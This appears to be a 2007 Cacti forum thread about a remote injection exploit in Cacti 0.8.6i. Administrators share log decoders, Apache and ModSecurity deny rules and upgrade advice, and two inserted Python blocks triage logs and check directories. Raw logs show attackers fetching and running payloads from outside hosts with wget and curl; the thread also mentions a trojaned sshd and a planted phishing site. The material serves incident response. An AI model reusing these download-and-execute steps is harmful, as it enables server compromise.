[Cacti <= 0.8.6i] Remote Injection Exploit


scratchspace
Posts: 1
Joined: Sun Jan 14, 2007 5:29 pm

Post by scratchspace »

Being as how we'd all like to know what it is these guys did to machines that were compromised, I wrote a script to decode the commands sent to the server. Fortunately, it appears these guys aren't taking all the steps to cover their tracks. One individual was clever enough to email himself. Enjoy.

Chris

Code:

#!/usr/bin/perl
use strict;
use warnings;

# Point to the log file
my $logfile = "/var/log/httpd/access_log";
open(my $fh, '<', $logfile) or die "Cannot open $logfile: $!";

while (my $line = <$fh>) {
   chomp $line;
   # Only look at requests for /cacti
   next unless $line =~ /cacti/;

   # Split the log line. $fields[6] should be the actual request if using common logfile format
   my @fields  = split / /, $line;
   my $request = $fields[6];
   next unless defined $request;

   # Chopping these up is kinda ugly....
   my @items  = split /,/, $request;
   my $decode = 0;
   foreach my $item (@items) {
      # Look for CHAR(, grab the first decimal number, start decoding the rest.
      # A one-character CHAR(n) closes in the same item, so finish there.
      if ($item =~ /CHAR\((\d+)(\))?/) {
         print chr($1);
         if ($2) { print "\n"; $decode = 0; } else { $decode = 1; }
      }
      # Look for the close paren, grab the last decimal number, stop decoding.
      elsif ($item =~ /^(\d+)\)/) {
         print chr($1), "\n";
         $decode = 0;
      }
      # Decode the middle decimal numbers. The elsif chain keeps the CHAR( item
      # itself from being fed to chr() a second time (that printed a NUL byte).
      elsif ($decode && $item =~ /^(\d+)$/) {
         print chr($1);
      }
   }
}
close $fh;
dagonet
Cacti User
Posts: 90
Joined: Sat Oct 29, 2005 4:05 pm
Location: Wuerzburg

Post by dagonet »

Hello Community,

We should also consider the use of modsecurity http://www.modsecurity.org for apache installations.
I installed this module. So, now if you want to do a request for example on the cmd.php you will get the 403 response code.

For IIS installations it is quite easy to put a redirect on particular files:
cacti/cmd.php
cacti/copy_cacti_user.php
cacti/poller.php
cacti/poller_commands.php
cacti/poller_export.php
cacti/poller_reindex_hosts.php
cacti/rebuild_poller_cache.php
cacti/script_server.php
cacti/scripts
cacti/include
cacti/install

You can do it from the management console of the IIS.

Dagonet
raX
Lead Developer
Posts: 2243
Joined: Sat Oct 13, 2001 7:00 pm
Location: Carlisle, PA

Post by raX »

In addition to the official patches for this vulnerability, Cacti version 0.8.6j has just been released.

http://www.cacti.net/release_notes_0_8_6j.php

Be sure to upgrade ASAP!

-Ian
Mehuge
Posts: 4
Joined: Thu Feb 23, 2006 11:34 am

Post by Mehuge »

Humm...

I just did yum update and got 0.8.6i then noticed in this post that 0.8.6j was out, so downloaded and updated using rpm -U cacti-0.8.6j.fc4.i386.rpm

It made me go through the install process again, remembered all my graphs and data sources etc but has lost all historical data.

Is this normal? Is it possible to recover this data? Is it because I upgraded two versions without going through the install process in between?

I upgraded (and am in this thread) because my server was compromised via this exploit. Extracts from my logs of the various hack attempts for your reference:

access_log wrote:
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 303
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /cmd.php HTTP/1.1" 404 285
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /cacti/cmd.php HTTP/1.1" 200 92
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /portal/cacti/cmd.php HTTP/1.1" 404 298
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /portal/cmd.php HTTP/1.1" 404 292
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /stats/cmd.php HTTP/1.1" 404 291
error_log wrote:
[client 80.48.30.10] PHP Notice: Undefined index: 1 in /var/lib/cacti/lib/functions.php on line 511
[client 80.48.30.10] PHP Notice: Undefined index: total_polls in /var/lib/cacti/lib/functions.php on line 511
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 512
[client 80.48.30.10] PHP Notice: Undefined index: snmp_community in /var/lib/cacti/lib/functions.php on line 523
[client 80.48.30.10] PHP Notice: Undefined index: max_time in /var/lib/cacti/lib/functions.php on line 536
[client 80.48.30.10] PHP Notice: Undefined index: min_time in /var/lib/cacti/lib/functions.php on line 540
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 544
[client 80.48.30.10] PHP Notice: Undefined index: avg_time in /var/lib/cacti/lib/functions.php on line 545
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 545
[client 80.48.30.10] PHP Notice: Undefined index: status in /var/lib/cacti/lib/functions.php on line 548
[client 80.48.30.10] PHP Notice: Undefined index: status in /var/lib/cacti/lib/functions.php on line 548
[client 80.48.30.10] PHP Notice: Undefined index: status_fail_date in /var/lib/cacti/lib/functions.php on line 624
[client 80.48.30.10] PHP Notice: Undefined index: status_rec_date in /var/lib/cacti/lib/functions.php on line 625
[client 80.48.30.10] PHP Notice: Undefined index: status_last_error in /var/lib/cacti/lib/functions.php on line 626
[client 80.48.30.10] PHP Notice: Undefined index: min_time in /var/lib/cacti/lib/functions.php on line 627
[client 80.48.30.10] PHP Notice: Undefined index: max_time in /var/lib/cacti/lib/functions.php on line 628
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 632
[client 80.48.30.10] PHP Notice: Undefined index: hostname in /var/lib/cacti/lib/functions.php on line 634
--15:22:38-- http://881107.com/ping.txt
=> `ping.txt'
Resolving 881107.com... 221.251.37.64
Connecting to 881107.com|221.251.37.64|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 358 [text/plain]
ping.txt: Permission denied

Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory
Another more determined attempt was made today using the same exploit but failed again.
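Scratchspace's CHAR() decoder and Mehuge's access_log extract above describe the two things a defender wants from the web server log after one of these probes: which client asked for cmd.php and where it found it, and what the CHAR(n,n,...) sequences in the requests spell out. The Python below is an added example written for this page, not code from the thread or from the Cacti project. It groups cmd.php requests by client address and reports the paths that answered 200 (the installed copy, as in the extract above), and it decodes every MySQL CHAR() sequence in a request after URL-decoding it, so it also handles %28/%2C-encoded parentheses and commas and more than one sequence per request, which the Perl script above does not. It assumes the common log format; the sample lines are constructed for the example (documentation-range addresses 192.0.2.x, modelled on the extract above).

```python
"""Triage Apache access_log lines for Cacti cmd.php probes and decode CHAR() payloads.

Added example, not code from the forum thread or from Cacti.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# Common/combined log format: client, timestamp, "METHOD path HTTP/x", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# MySQL CHAR(104,101,...) sequence; matched after the request has been URL-decoded
CHAR_RE = re.compile(r'CHAR\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)', re.IGNORECASE)


def parse_line(line):
    """Return (ip, path, status) or None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), m.group("path"), int(m.group("status"))


def decode_char_sequences(request):
    """Decode every CHAR(...) in a request path into the string it builds."""
    decoded = unquote(request)
    out = []
    for seq in CHAR_RE.findall(decoded):
        codes = [int(n) for n in seq.split(",")]
        # Each CHAR() argument is one byte; skip anything out of range rather than raise
        out.append("".join(chr(c) for c in codes if 0 <= c <= 255))
    return out


def find_cmd_php_probes(lines):
    """Group cmd.php requests by client; return {ip: {"hits": n, "found": [paths that gave 200]}}."""
    report = defaultdict(lambda: {"hits": 0, "found": []})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, status = parsed
        script = path.split("?", 1)[0]          # path without the query string
        if "cmd.php" not in script:
            continue
        entry = report[ip]
        entry["hits"] += 1
        if status == 200:
            entry["found"].append(script)
    return dict(report)


def triage(lines):
    """Run both checks; return (probe report, {ip: [decoded CHAR() strings]})."""
    payloads = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, _status = parsed
        for text in decode_char_sequences(path):
            payloads[ip].append(text)
    return find_cmd_php_probes(lines), dict(payloads)


# Constructed sample lines modelled on the extract above (documentation-range addresses, not real clients)
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jan/2007:15:20:43 +0000] "GET /cmd.php HTTP/1.1" 404 285',
    '192.0.2.10 - - [29/Jan/2007:15:20:43 +0000] "GET /cacti/cmd.php HTTP/1.1" 200 92',
    '192.0.2.10 - - [29/Jan/2007:15:20:43 +0000] "GET /portal/cacti/cmd.php HTTP/1.1" 404 298',
    '192.0.2.10 - - [29/Jan/2007:15:20:44 +0000] "GET /cacti/cmd.php?x=CHAR%28104%2C101%2C108%2C108%2C111%29 HTTP/1.1" 200 92',
    '192.0.2.20 - - [29/Jan/2007:16:01:02 +0000] "GET /cacti/graph_view.php HTTP/1.1" 200 4120',
]

if __name__ == "__main__":
    probes, payloads = triage(SAMPLE_LOG)
    for ip, info in probes.items():
        print(f"{ip}: {info['hits']} cmd.php request(s); answered 200 at {info['found'] or 'none'}")
    for ip, strings in payloads.items():
        print(f"{ip}: decoded CHAR() payloads {strings}")
```

Point it at the real access_log by reading the file into `triage()` line by line; a client whose `found` list is non-empty has located the installed copy, and the decoded strings show what its follow-up requests were assembling.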
gandalf
Developer
Posts: 22383
Joined: Thu Dec 02, 2004 2:46 am
Location: Muenster, Germany

Post by gandalf »

When upgrading, make sure to apply the latest patches from the main cacti site.
Reinhard
wolf905
Posts: 1
Joined: Sat Feb 03, 2007 11:45 pm

Exploits in the Wild

Post by wolf905 »

All,

Please excuse me if this is all old news.

I have had cacti lurking in the background on my web server for some time. Being that the machine is a personal web/e-mail server, it doesn't get a lot of attention.

This morning, I discovered my inbox full of errors from the cron daemon. It appears someone was using the cacti exploit to gain access to my system.

This was a non-trivial attack. Even though apache ran in its own userid, the attacker used a kernel exploit (I was running an older linux kernel version, 2.6.17) to gain root access. The attacker successfully replaced my sshd with a trojan, which copied login/passwords to a file in /usr/include/gpm3.h. Also, there was no trace of the commands he ran through the web server. All that I had in the logs were a whole lot of "Connection Refused" errors, and this:

Code:

--22:09:42--  http://207.58.141.211/~gr/ping
           => `ping'
Connecting to 207.58.141.211:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 629 [text/plain]
ping: Permission denied

Cannot write to `ping' (Permission denied).
mv: cannot stat `ping': No such file or directory
Can't open perl script "temp2006": No such file or directory
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
^M100   629  100   629    0     0   6685      0 --:--:-- --:--:-- --:--:--  6685
curl: (23) Failed writing body
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
^M100   629  100   629    0     0   6701      0 --:--:-- --:--:-- --:--:--  6701^M100   629  100   629    0     0   6688      0 --:-
-:-- --:--:-- --:--:--     0
Error: Connection refused
What the attacker failed to do was log into my system. The sshd they installed broke my sshd configuration (I have a slightly unusual setup), and they were thereafter unable to log in. He did a decent job of covering his tracks, and deleted my cacti.log, but left enough of a trail for me to identify what he was doing. Regardless, this idiot caused my system to reload, broke in far enough to warrant re-imaging (upgrading to FC6), and ticked me off. :evil:

A previous attacker attempted to gain access to my system on the 25th of Jan, but was unable to break out of the apache user account. This attacker's attempts were fairly well documented in the log files as a series of attempts to use the basic milw0rm.com exploit.

Just thought I'd document my findings, and let people know that this is being actively exploited in the wild. If you have any system holes (like my kernel privilege escalation vulnerability), this cacti vulnerability could be big trouble.

Good luck,
WLF
kaptk2
Posts: 14
Joined: Wed Feb 16, 2005 3:27 pm
Location: Western United States

Post by kaptk2 »

What is the best way to recover from this attack? Can anybody offer hints on what to do to clean up a compromised system?
rony
Developer/Forum Admin
Posts: 6022
Joined: Mon Nov 17, 2003 6:35 pm
Location: Michigan, USA

Post by rony »

If you even suspect a compromise, I would suggest a system reload.

You can backup and restore your cacti installation, not the whole server.
shahzadmasih
Posts: 1
Joined: Wed Feb 28, 2007 9:21 am
Location: UK

Post by shahzadmasih »

Hi, This post is very informative, however I would like some specific information. If someone can help me then please send me a private message. Best Regards,
rony
Developer/Forum Admin
Posts: 6022
Joined: Mon Nov 17, 2003 6:35 pm
Location: Michigan, USA

Post by rony »

shahzadmasih wrote:
Hi, This post is very informative, however I would like some specific information. If someone can help me then please send me a private message. Best Regards,
What would you like more information on?
JJX
Cacti User
Posts: 402
Joined: Thu Oct 06, 2005 5:03 am

Post by JJX »

dagonet wrote:
Hello Community,

We should also consider the use of modsecurity http://www.modsecurity.org for apache installations.
I installed this module. So, now if you want to do a request for example on the cmd.php you will get the 403 response code.

For IIS installations it is quite easy to put a redirect on particular files:
cacti/cmd.php
cacti/copy_cacti_user.php
cacti/poller.php
cacti/poller_commands.php
cacti/poller_export.php
cacti/poller_reindex_hosts.php
cacti/rebuild_poller_cache.php
cacti/script_server.php
cacti/scripts
cacti/include
cacti/install

You can do it from the management console of the IIS.

Dagonet
Is it possible to share with us the configuration of mod_security that affects cacti?
mooreds
Posts: 1
Joined: Fri Apr 06, 2007 12:38 pm
Location: Boulder, CO

Post by mooreds »

dagonet wrote:
Hello Community,

We should also consider the use of modsecurity http://www.modsecurity.org for apache installations.
I installed this module. So, now if you want to do a request for example on the cmd.php you will get the 403 response code.

For IIS installations it is quite easy to put a redirect on particular files:
cacti/cmd.php
cacti/copy_cacti_user.php
cacti/poller.php
cacti/poller_commands.php
cacti/poller_export.php
cacti/poller_reindex_hosts.php
cacti/rebuild_poller_cache.php
cacti/script_server.php
cacti/scripts
cacti/include
cacti/install

You can do it from the management console of the IIS.

Dagonet
You can block access to cacti files and directories with Apache as well, and I don't know if you need mod_security. Inside your virtual server or document root, put entries like this:

Code:

    <Files cmd.php>
            Order allow,deny
            Deny from all
    </Files>

    <Directory /usr/local/cacti-0.8.6j/log>
            Order allow,deny
            Deny from all
    </Directory>
See http://httpd.apache.org/docs/1.3/mod/co ... #directory and http://httpd.apache.org/docs/1.3/mod/core.html#files for more.
JustJoe
Posts: 10
Joined: Thu Mar 24, 2005 9:15 am

Post by JustJoe »

Of course this vulnerability is solved now, but I just wanted to let people know it's ABSOLUTELY VITAL to UPDATE. I just found out the hard way: I was hacked. Big time. They managed to put a Paypal phishing site on my home webby using this vulnerability.

A few days ago i got a call from my isp informing me they had shutdown my internet connection because they received notice from Verisign that a fraudulent website was active on my IP. I fell out of my chair. Seriously.
Going through Apache logs I found when they hacked in. Only 15 hours after they got in the phishing started. The log shows countless GETs on URLs like

Code:

 /cacti/rra/www.paypal.fr/cgi-bin/webscr/
SignIn&co_partnerId=2&pUserId=&siteid=0&pageType=&pa1/
Update-profile-notify/index.html
They must have sent out e-mails to lots of paypal.fr clients persuading them to 'reactivate their account'. I found this picture of what it must've looked like.

The phishing lasted for 4 days. Now my isp has disconnected me during the investigation. I'm quite confident i'll be proven innocent and get my internet connection back next week. So no real harm done to me but i don't know how many people fell for this shit and gave the criminals their Paypal login and/or CC credentials....

So, the moral of the story, as said before:

ALWAYS KEEP YOUR SOFTWARE UP-TO-DATE !
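JustJoe's post shows the dropped site living under /cacti/rra/, the directory the poller writes its RRD files into, which is why the web server user can write there. A simple integrity check for that directory, as an added example that is not from the thread or from Cacti: it lists anything under rra/ that is not a plain .rrd file, including subdirectories, and it also reads the first bytes of each .rrd file for the RRDtool header cookie, so a web page renamed to .rrd does not pass. The expectation that rra/ holds only flat .rrd files is an assumption made here for the example, and the sample tree is constructed with tempfile.

```python
"""List what does not belong in Cacti's rra/ directory.

Added example, not code from the forum thread or from Cacti.
"""
import os
import tempfile

EXPECTED_SUFFIXES = (".rrd",)   # assumption for this example: rra/ holds only RRD files
RRD_COOKIE = b"RRD"             # first bytes of every RRDtool file header


def looks_like_rrd(path):
    """True if the file starts with the RRDtool header cookie."""
    with open(path, "rb") as fh:
        return fh.read(len(RRD_COOKIE)) == RRD_COOKIE


def unexpected_files(rra_dir, expected=EXPECTED_SUFFIXES):
    """Return sorted (kind, relative path) findings for anything that should not be in rra/:
    subdirectories, files without an expected suffix, and .rrd files without RRD content."""
    findings = []
    for root, dirs, files in os.walk(rra_dir):
        rel_root = os.path.relpath(root, rra_dir)
        for d in dirs:
            findings.append(("directory", os.path.normpath(os.path.join(rel_root, d))))
        for f in files:
            rel = os.path.normpath(os.path.join(rel_root, f))
            full = os.path.join(root, f)
            if not f.lower().endswith(expected):
                findings.append(("file", rel))
            elif not looks_like_rrd(full):
                findings.append(("not-rrd-content", rel))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample rra/ tree: two files with a genuine-looking RRD header, one HTML
    file renamed to .rrd, and a planted directory with a web page in it."""
    base = tempfile.mkdtemp(prefix="rra-sample-")
    header = RRD_COOKIE + b"\x00" + b"0003\x00"   # cookie plus version string, as RRDtool writes them
    for name in ("localhost_load_1min_5.rrd", "localhost_users_6.rrd"):
        with open(os.path.join(base, name), "wb") as fh:
            fh.write(header)
    with open(os.path.join(base, "fake_graph.rrd"), "w") as fh:
        fh.write("<html>constructed: not an RRD file</html>\n")
    planted = os.path.join(base, "www.example.invalid", "cgi-bin")
    os.makedirs(planted)
    with open(os.path.join(planted, "index.html"), "w") as fh:
        fh.write("<html>constructed: stands in for a dropped page</html>\n")
    return base


if __name__ == "__main__":
    sample = build_sample_tree()
    for kind, path in unexpected_files(sample):
        print(f"{kind}: {path}")
```

Run `unexpected_files()` against the real rra/ path from cron and mail yourself the output; an empty list is the normal state, and any directory or non-RRD file showing up is worth the same look the posts above gave their logs. Pair it with mooreds' Apache `<Directory>` deny for directories the web server has to write to but never needs to serve.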